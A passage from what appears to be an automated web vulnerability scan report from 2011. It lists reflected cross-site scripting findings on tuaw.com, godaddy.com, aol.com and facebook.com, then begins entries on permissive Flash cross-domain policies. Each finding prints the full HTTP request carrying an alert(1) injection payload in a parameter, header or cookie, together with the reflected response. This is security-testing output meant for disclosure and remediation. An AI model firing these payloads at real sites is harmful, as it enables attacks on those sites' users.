Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

2.50. http://www.aol.com/ [dlact cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.51. http://www.aol.com/ [rrpmo1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

3. Flash cross-domain policy  previous  next
There are 26 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.aolcdn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.2. http://www.everydayhealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

